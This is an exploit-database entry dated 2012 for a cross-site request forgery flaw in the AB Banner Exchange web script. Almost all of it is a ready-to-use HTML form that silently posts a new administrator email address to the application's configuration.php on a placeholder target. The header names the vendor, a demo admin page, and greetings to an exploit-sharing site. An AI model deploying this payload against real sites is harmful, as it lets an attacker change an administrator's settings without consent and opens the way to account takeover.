id: 17873
date: 03/29/2012
title: AB Banner Exchange CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: AB Banner Exchange CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/ab-banner-exchange/20795/
# Category::  webapps
# Demo : http://www.scripts-demo.com/ab-banner-exchange/administration/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com




<form method="POST" action="target.com/[PATH]/configuration.php">
<input class="field10" maxlength="70" style="width: 650px;" name="mail" value="mail@mail.com" type="hidden">
<input value="Save all values" name="D1" class="button10" type="submit">
</form>



#  0day.today [2023-03-27]  #